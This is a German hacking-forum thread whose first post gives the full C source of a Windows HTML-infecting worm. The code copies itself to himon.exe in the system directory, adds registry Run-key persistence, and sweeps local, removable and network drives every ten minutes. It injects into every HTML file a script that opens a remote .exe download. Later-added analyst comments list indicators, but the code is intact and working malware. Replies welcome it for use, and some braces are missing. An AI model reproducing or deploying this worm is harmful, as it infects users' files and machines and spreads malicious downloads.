  1. #1
    NoClose Wurm Avatar von VincentSX

    Standard Win32.HTML Worm[WG]

    Code:
    HTML Worm
    // Name: Win32.HTMLworm[WG Edit]
    // Author: WarGame
    // Compiler: Borland C++
    // Description: This worm spreads by adding a link to itself in html files
    // Improvements: You could add a link to a page containing an IE exploits :)
    
    #include <windows.h>
    #include <string>
    using namespace std; // :)
    
    // HTMLSpread: the file-modification routine of this sample.
    // Opens the file named by `htmlfile` for read/write, loads it into memory and
    // replaces the first "</body>" (or, failing that, "</BODY>") with a <script>
    // element that calls window.open() on a hard-coded .exe URL, followed by a new
    // "</body>". The modified text is written back from offset 0 and a marker is
    // written after it. Returns nothing; every failure path simply returns.
    //
    // Analyst notes (detection / clean-up):
    //  - Content indicator: a <script language="javascript"> block containing
    //    window.open('...exe') immediately before </body> in .htm/.html files.
    //  - Behavioural indicator: a single non-browser, non-editor process opening
    //    many existing HTML files with GENERIC_READ|GENERIC_WRITE.
    //  - Remediation means removing the injected block from each affected file,
    //    or restoring the files from a known-good copy.
    void HTMLSpread(char *htmlfile)
    {
      HANDLE html_fd;
      DWORD html_filesize,read_bytes,written_bytes;
      char *c_htmlcode = NULL;
      string *htmlcode = NULL; // heap-allocated std::string used for find/replace
      long pos;
    
      // Open the existing HTML file for in-place modification (OPEN_EXISTING:
      // nothing is created if the path does not exist).
      html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
                FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    
      if(html_fd == INVALID_HANDLE_VALUE)
      {
          return;
      }
    
      // Low 32 bits of the file size (the high-part pointer is NULL).
      html_filesize = GetFileSize(html_fd,NULL);
    
      // Buffer sized to the file contents.
      c_htmlcode = (char *)malloc(html_filesize);
    
      if(c_htmlcode == NULL)
      {
          return;
      }
    
      // Read the whole file in one call; give up on failure.
      if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
      {
          CloseHandle(html_fd);
          return;
      }
    
      // Copy the buffer into a std::string so find()/replace() can be used.
      htmlcode = new string(c_htmlcode);
      free(c_htmlcode);
    
      // Re-infection guard: only modify files that do not yet contain the marker.
      // NOTE(review): the marker literal is empty in this listing. The 36-byte
      // length passed to the second WriteFile call below suggests the original
      // string was lost when the forum page was rendered (possibly an HTML
      // comment) -- confirm against another copy before relying on it as an
      // indicator.
      if(htmlcode->find("") == string::npos)
      {
    
      // Locate the closing body tag, lower-case first, then upper-case.
      pos = htmlcode->find("</body>");
    
          if(pos == string::npos)
          {
            pos = htmlcode->find("</BODY>");
    
              if(pos == string::npos)
              {
                // No closing body tag: leave the file untouched.
                CloseHandle(html_fd);
                delete htmlcode;
                return;
              }
          }
    
      // Replace the 7-character closing tag with the script block plus a fresh
      // "</body>". The exact script text and its URL are the strings to search
      // for when sweeping web roots and user documents for affected pages.
      htmlcode->replace(pos,7,"\r\n<script language=\"javascript\">window.open('http://website.com/artwork.exe')</script>\r\n</body>");
    
      // Rewind and overwrite the file with the modified text.
      SetFilePointer(html_fd,0,0,FILE_BEGIN);
      WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
      // Marker written directly after the page content (see NOTE above: the
      // literal is empty as posted, the length argument is 36).
      WriteFile(html_fd,"",36,&written_bytes,NULL);
    
      }
    
      // Release the file handle and the string on the normal path.
      CloseHandle(html_fd);
      delete htmlcode;
    
    }
    
    // AutoStart: persistence via the registry Run keys.
    // Writes a REG_SZ value named "himon" whose data is `my_path` under
    // Software\Microsoft\Windows\CurrentVersion\Run, first in HKEY_LOCAL_MACHINE
    // and then in HKEY_CURRENT_USER. Each hive is attempted independently; if a
    // key cannot be opened with KEY_WRITE that hive is silently skipped.
    //
    // Analyst notes: a Run value named "himon" in either hive is a host
    // indicator for this sample. The caller in this file passes a path ending in
    // "\himon.exe" under the system directory. Clean-up requires deleting the
    // value from both hives as well as the file it points to.
    void AutoStart(char *my_path)
    {
        HKEY hkey;
    
         // Machine-wide Run key.
         if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
             "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
             KEY_WRITE,&hkey)==ERROR_SUCCESS)
         {
                RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
                RegCloseKey(hkey);
         }
    
         // Per-user Run key, written with the same value name and data.
         if(RegOpenKeyEx(HKEY_CURRENT_USER,
             "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
             KEY_WRITE,&hkey)==ERROR_SUCCESS)
         {
                RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
                RegCloseKey(hkey);
         }
    }
    
    // S3arch: recursive directory walk that selects the files to modify.
    // Starting at `pt`, enumerates "<pt>\*.*", recurses into every directory
    // entry other than "." and "..", and passes every other entry whose name
    // contains ".html" or ".htm" to HTMLSpread. `pt` is modified in place when
    // it is exactly three characters long (a drive root such as "C:\").
    //
    // Analyst notes: the name test uses strstr, so it matches the substring
    // anywhere in the file name rather than the extension only. On a host this
    // shows up as a full-tree FindFirstFile/FindNextFile sweep of each drive
    // followed by write-opens of HTML files.
    // NOTE(review): the brace structure of this function appears damaged in the
    // posted listing; it is reproduced here exactly as posted.
    void S3arch(char *pt) {
         char sc[MAX_PATH],buf[MAX_PATH];
         WIN32_FIND_DATA in;
         HANDLE fd,file;
         char *fm = "%s\\%s",*fm1 = "%s\\*.*";
    
         // A three-character argument is treated as a drive root: drop the
         // trailing backslash so the format strings below add exactly one.
         if(strlen(pt) == 3)
         {
            pt[2] = '\0'; /* :-) */
         }
    
         // Build the wildcard pattern for this directory and start enumerating.
         sprintf(sc,fm1,pt);
      fd = FindFirstFile(sc,&in);
    
    do
    {
    
         // Full path of the current directory entry.
         sprintf(buf,fm,pt,in.cFileName);
    
         /* Sub-directory other than "." and "..": descend into it. */
         if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
         {
             S3arch(buf);
         }
    
         /* Any other entry */
         else
         {
    
             /* Select entries whose name contains ".html" or ".htm". */
    
             if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
             {
                 HTMLSpread(buf);
             }
         
    
    }while(FindNextFile(fd,&in));
    
    FindClose(fd);
    }
    
    
    // WinMain: program entry point. Visible sequence:
    //   1. create a named mutex (intended single-instance check),
    //   2. copy the running executable to "<system directory>\himon.exe",
    //   3. register that path via AutoStart (registry Run keys),
    //   4. loop forever: for each drive letter C..Z whose type is fixed, remote
    //      or removable, call S3arch on its root, then sleep ten minutes.
    //
    // Analyst notes (host indicators taken from this listing):
    //   - mutex name "__HTMLworm_by_WarGame_EOF__"
    //   - file "himon.exe" in the Windows system directory
    //   - Run value "himon" (written by AutoStart)
    //   - a periodic, ten-minute full-drive sweep for .htm/.html files
    // DRIVE_REMOTE is included, so mapped network shares (for example shared
    // web content) are within scope; check those as well during clean-up.
    // NOTE(review): the listing ends without the function's closing brace; the
    // lines that follow on the page are the poster's forum signature.
    int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
        // Installation and persistence set-up.
        char I_am_here[MAX_PATH],installation_path[MAX_PATH];
        char Drives[3],Drive = 0;
        UINT drive_type;
    
    
        // Intended single-instance check based on a named mutex. The mutex name
        // is a stable host indicator and is visible in process handle listings.
        CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
        if(GetLastError() == ERROR_ALREADY_EXISTS)
        {
        ExitProcess;
        }
    
        // Destination path: the system directory plus "\himon.exe".
        GetSystemDirectory(installation_path,MAX_PATH);
        strcat(installation_path,"\\himon.exe");
    
        // Path of the currently running executable.
        GetModuleFileName(NULL,I_am_here,MAX_PATH);
        // Self-copy; the FALSE argument means an existing destination file is overwritten.
        CopyFile(I_am_here,installation_path,FALSE);
        AutoStart(installation_path);
    
    
        // Main loop: never exits.
        while(1)
        {
    
             /* Walk drive letters C through Z. */
            for(Drive = 'C';Drive <= 'Z';Drive++)
            {
            // Build the root path string "X:\" for this letter.
            Drives[0] = Drive;
            Drives[1] = ':';
            Drives[2] = '\\';
            Drives[3] = '\0';
    
            /* Query what kind of drive this letter maps to, if any. */
            drive_type = GetDriveType(Drives);
    
                 /* only fixed, remote and removable drives */
               if(drive_type == DRIVE_FIXED ||
                    drive_type == DRIVE_REMOTE ||
                      drive_type == DRIVE_REMOVABLE)
                 {
                       /* Recursive scan of this drive. */
                     S3arch(Drives);
                 }
            }
    
            /* Pause ten minutes between sweeps (milliseconds). */
            Sleep((1000*60)*10);
        }
    -> mein Blog.: http://maymag.tk
    -- c0ding is passioN --

  2. #2
    W32.Lovgate

    Standard

    wow thx
    woher hasten diesen code?

    den werden einige hier gebrauchen...

  3. #3
    Linus Torvalds Avatar von kInGoFcHaOs

    Standard

    n1c3h4x0r! was is an dem so besonders?
